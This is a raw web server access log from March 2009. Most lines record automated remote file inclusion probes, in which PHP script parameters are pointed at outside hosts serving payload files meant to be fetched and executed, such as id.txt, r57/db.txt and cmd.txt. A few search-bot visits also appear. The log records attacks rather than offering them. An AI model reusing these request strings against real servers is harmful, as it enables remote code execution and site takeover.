85.186.255.184 - - [07/Mar/2009:14:44:47 -0600] "GET /logs//appserv/main.php?appserv_root=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:14:44:47 -0600] "GET /logs/access_log.1231977600//appserv/main.php?appserv_root=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.246.91.45 - - [07/Mar/2009:14:48:18 -0600] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
216.246.91.45 - - [07/Mar/2009:14:48:18 -0600] "GET /logs/access_log.1230163200/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
216.246.91.45 - - [07/Mar/2009:14:48:19 -0600] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.xgamex.org/fx29id.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
208.186.130.6 - - [07/Mar/2009:14:48:37 -0600] "GET ///vwar/backup/errors.php?error=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.0" 404 295 "-""Mozilla/5.0"
208.186.130.6 - - [07/Mar/2009:14:48:37 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.0" 404 300 "-""Mozilla/5.0"
208.186.130.6 - - [07/Mar/2009:14:48:37 -0600] "GET /logs/access_log.1228262400///vwar/backup/errors.php?error=http://www.flywayproperty.com/module/copyright.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
139.179.10.6 - - [07/Mar/2009:14:49:28 -0600] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
91.93.97.106 - - [07/Mar/2009:14:49:39 -0600] "GET ///?_zb_path=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:14:49:45 -0600] "GET /logs///?_zb_path=http://www.dr52.co.kr//data/db/id2.txt??? HTTP/1.1" 200 180673 "-""libwww-perl/5.805"
139.179.10.6 - - [07/Mar/2009:14:51:53 -0600] "GET /logs/access_log.1232928000/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
91.93.97.106 - - [07/Mar/2009:14:52:30 -0600] "GET ///?_zb_path=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 200 3246 "-""libwww-perl/5.805"
91.93.97.106 - - [07/Mar/2009:14:52:37 -0600] "GET /logs///?_zb_path=http://www.dr52.co.kr//data/db/id3.txt??? HTTP/1.1" 200 180673 "-""libwww-perl/5.805"
65.55.208.131 - - [07/Mar/2009:14:53:58 -0600] "GET /logs/access_log.1159228800 HTTP/1.1" 200 2624 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
139.179.10.6 - - [07/Mar/2009:14:54:30 -0600] "GET /logs/access_log.1233705600/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
139.179.10.6 - - [07/Mar/2009:14:55:29 -0600] "GET /logs/access_log.1232928000/includes/ktedit/toolbar.php?dirDepth=http://okto.co.kr//zboard/include/tukulid.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
196.29.205.44 - - [07/Mar/2009:14:58:02 -0600] "GET /logs/access_log.1228262400 HTTP/1.1" 200 12042 "http://au.search.yahoo.com/search?p=for&meta=""Mozilla/4.0 (compatible; MSIE 5.0b1; Mac_PowerPC)"
65.55.230.166 - - [07/Mar/2009:14:59:41 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.230.166 - - [07/Mar/2009:14:59:42 -0600] "GET /logs/?S=A HTTP/1.1" 200 180667 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
203.16.61.106 - - [07/Mar/2009:15:00:47 -0600] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
203.16.61.106 - - [07/Mar/2009:15:00:47 -0600] "GET /logs/access_log.1233619200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
203.16.61.106 - - [07/Mar/2009:15:00:47 -0600] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
203.16.61.106 - - [07/Mar/2009:15:01:08 -0600] "GET /logs/access_log.1233792000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:01:10 -0600] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:01:10 -0600] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:01:10 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:01:14 -0600] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
87.101.4.49 - - [07/Mar/2009:15:03:40 -0600] "GET /logs/errors.php?error=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
87.101.4.49 - - [07/Mar/2009:15:03:40 -0600] "GET /errors.php?error=http://weko.co.kr/data/file/notice/test.txt??%0D?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
210.179.177.167 - - [07/Mar/2009:15:03:43 -0600] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
210.179.177.167 - - [07/Mar/2009:15:03:43 -0600] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
210.179.177.167 - - [07/Mar/2009:15:03:43 -0600] "GET /logs/access_log.1233619200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
210.179.177.167 - - [07/Mar/2009:15:04:49 -0600] "GET /logs/access_log.1233792000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:05:35 -0600] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:05:35 -0600] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:05:39 -0600] "GET /logs/access_log.1233878400//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:05:39 -0600] "GET /logs/access_log.1234224000//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:15:06:48 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:15:06:48 -0600] "GET //modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:15:06:48 -0600] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
67.19.130.218 - - [07/Mar/2009:15:07:06 -0600] "GET /logs/access_log.1234742400//modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
66.194.251.253 - - [07/Mar/2009:15:08:40 -0600] "GET /logs/access_log.1233792000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 386 "-""Mozilla/5.0"
66.194.251.253 - - [07/Mar/2009:15:08:40 -0600] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 364 "-""Mozilla/5.0"
66.194.251.253 - - [07/Mar/2009:15:08:40 -0600] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.aercoppo.it//assets/snippets/reflect/fx29id1.txt? HTTP/1.1" 404 359 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:15:11:26 -0600] "GET //modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:15:11:26 -0600] "GET /logs//modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
85.186.255.184 - - [07/Mar/2009:15:11:26 -0600] "GET /logs/access_log.1233532800//modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
72.52.213.40 - - [07/Mar/2009:15:11:31 -0600] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
72.52.213.40 - - [07/Mar/2009:15:11:31 -0600] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
85.186.255.184 - - [07/Mar/2009:15:11:56 -0600] "GET /logs/access_log.1234742400//modules/xfsection/modify.php?dir_module=http://boostserver.com/fantastico/upload/bb/copyright.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.55.230.164 - - [07/Mar/2009:15:15:17 -0600] "GET /logs/access_log.1230940800 HTTP/1.1" 304 - "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
69.13.197.34 - - [07/Mar/2009:15:18:35 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:35 -0600] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:35 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:35 -0600] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:38 -0600] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:38 -0600] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:38 -0600] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
69.13.197.34 - - [07/Mar/2009:15:18:38 -0600] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://gumansin.com/id.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:15:20:34 -0600] "GET /logs/access_log.1233792000//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 374 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:15:20:34 -0600] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 352 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:15:20:34 -0600] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 347 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:15:20:34 -0600] "GET /logs/access_log.1234828800//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 374 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:15:21:34 -0600] "GET /logs/access_log.1233619200//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 374 "-""libwww-perl/5.808"
72.52.213.40 - - [07/Mar/2009:15:22:12 -0600] "GET /lostpasswd.php?env[include_prefix]=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
72.52.213.40 - - [07/Mar/2009:15:22:13 -0600] "GET /logs/lostpasswd.php?env[include_prefix]=http://imagehut.ws/images/tops.gif??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
85.237.201.58 - - [07/Mar/2009:15:22:53 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:15:22:53 -0600] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:15:22:54 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:15:22:54 -0600] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.803"
62.44.70.253 - - [07/Mar/2009:15:34:58 -0600] "GET /logs/access_log.1234224000/environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:35:02 -0600] "GET /environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:35:02 -0600] "GET /logs/environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:35:24 -0600] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:36:56 -0600] "GET /logs/access_log.1234224000/environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:36:56 -0600] "GET /environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:36:57 -0600] "GET /logs/environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:15:37:08 -0600] "GET /logs/access_log.1234396800/environment.php?DIR_PREFIX=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
87.230.0.95 - - [07/Mar/2009:15:46:31 -0600] "GET /logs//index.php?DOCUMENT_ROOT=http://weko.co.kr/data/file/notice/test.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
87.230.0.95 - - [07/Mar/2009:15:46:32 -0600] "GET //index.php?DOCUMENT_ROOT=http://weko.co.kr/data/file/notice/test.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
85.237.201.58 - - [07/Mar/2009:15:49:18 -0600] "GET /logs//?_SESSION%5Bdocroot_path%5D=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 200 180672 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:15:49:18 -0600] "GET //?_SESSION%5Bdocroot_path%5D=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:15:49:37 -0600] "GET /logs//?_SESSION%5Bdocroot_path%5D=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 200 180672 "-""libwww-perl/5.803"
85.237.201.58 - - [07/Mar/2009:15:49:38 -0600] "GET //?_SESSION%5Bdocroot_path%5D=http://lanaalaadi.com/gallery/data/r57/db.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
211.255.23.41 - - [07/Mar/2009:15:54:45 -0600] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
211.255.23.41 - - [07/Mar/2009:15:54:45 -0600] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
203.22.204.77 - - [07/Mar/2009:16:01:00 -0600] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/idb.txt?? HTTP/1.1" 404 346 "-""libwww-perl/5.76"
203.22.204.77 - - [07/Mar/2009:16:01:00 -0600] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.dr52.co.kr//data/db/idb.txt?? HTTP/1.1" 404 341 "-""libwww-perl/5.76"
67.15.48.60 - - [07/Mar/2009:16:02:48 -0600] "GET /logs//include/bbs.lib.inc.php?site_path=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.810"
67.15.48.60 - - [07/Mar/2009:16:02:48 -0600] "GET //include/bbs.lib.inc.php?site_path=http://members.mywave.at/m206111aa/cms//administrator/components/com_mkpostman/includes/poiid.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.810"
62.44.70.253 - - [07/Mar/2009:16:17:34 -0600] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:16:17:34 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:16:17:36 -0600] "GET /logs/access_log.1228262400///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:16:17:39 -0600] "GET /logs/access_log.1228262400///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:16:17:40 -0600] "GET ///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
62.44.70.253 - - [07/Mar/2009:16:17:41 -0600] "GET /logs///vwar/backup/errors.php?error=http://www.myremote.org//openx/fx29id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
200.160.96.54 - - [07/Mar/2009:16:23:42 -0600] "GET /errors.php?error=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 281 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:16:23:42 -0600] "GET /logs/errors.php?error=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 286 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:16:24:23 -0600] "GET /logs/errors.php?error=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 286 "-""libwww-perl/5.808"
200.160.96.54 - - [07/Mar/2009:16:24:28 -0600] "GET /errors.php?error=http://sindepol.com.br/idd.txt??%0D?? HTTP/1.0" 404 281 "-""libwww-perl/5.808"
66.7.212.241 - - [07/Mar/2009:16:25:25 -0600] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:25:26 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:25:26 -0600] "GET /logs/access_log.1234483200//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:25:35 -0600] "GET /logs/access_log.1234310400//admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.208.125 - - [07/Mar/2009:16:33:20 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [07/Mar/2009:16:33:21 -0600] "GET /logs/access_log.1208649600 HTTP/1.1" 200 1167 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.125 - - [07/Mar/2009:16:38:06 -0600] "GET /logs/access_log.1124323200 HTTP/1.1" 200 1516 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
219.85.63.226 - - [07/Mar/2009:16:38:36 -0600] "GET /logs/include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
219.85.63.226 - - [07/Mar/2009:16:38:36 -0600] "GET /include/lib.inc.php?site_path=http://envolverde.ig.com.br/tmp/chid.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
58.226.23.129 - - [07/Mar/2009:16:44:39 -0600] "GET /logs/access_log.1233792000//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:44:39 -0600] "GET //?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:44:41 -0600] "GET /logs//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:44:47 -0600] "GET /logs/access_log.1234569600//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:46:49 -0600] "GET //?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:46:49 -0600] "GET /logs/access_log.1234569600//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:46:49 -0600] "GET /logs/access_log.1233792000//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:46:50 -0600] "GET /logs//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:16:47:10 -0600] "GET /logs/access_log.1233792000//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:16:47:10 -0600] "GET //?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:16:47:12 -0600] "GET /logs//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:47:13 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:47:13 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:47:13 -0600] "GET /logs/access_log.1233187200//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
194.183.15.230 - - [07/Mar/2009:16:47:32 -0600] "GET /logs/access_log.1234569600//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:47:34 -0600] "GET //?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:47:34 -0600] "GET /logs/access_log.1233792000//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:47:36 -0600] "GET /logs//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 200 180672 "-""Mozilla/5.0"
58.226.23.129 - - [07/Mar/2009:16:47:41 -0600] "GET /logs/access_log.1234569600//?view=page&pagename=http://gumansin.com/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:48:34 -0600] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:48:34 -0600] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:48:34 -0600] "GET /logs/access_log.1233187200//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
66.7.212.241 - - [07/Mar/2009:16:51:07 -0600] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.freewebtown.com/fcorp/logo.gif?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
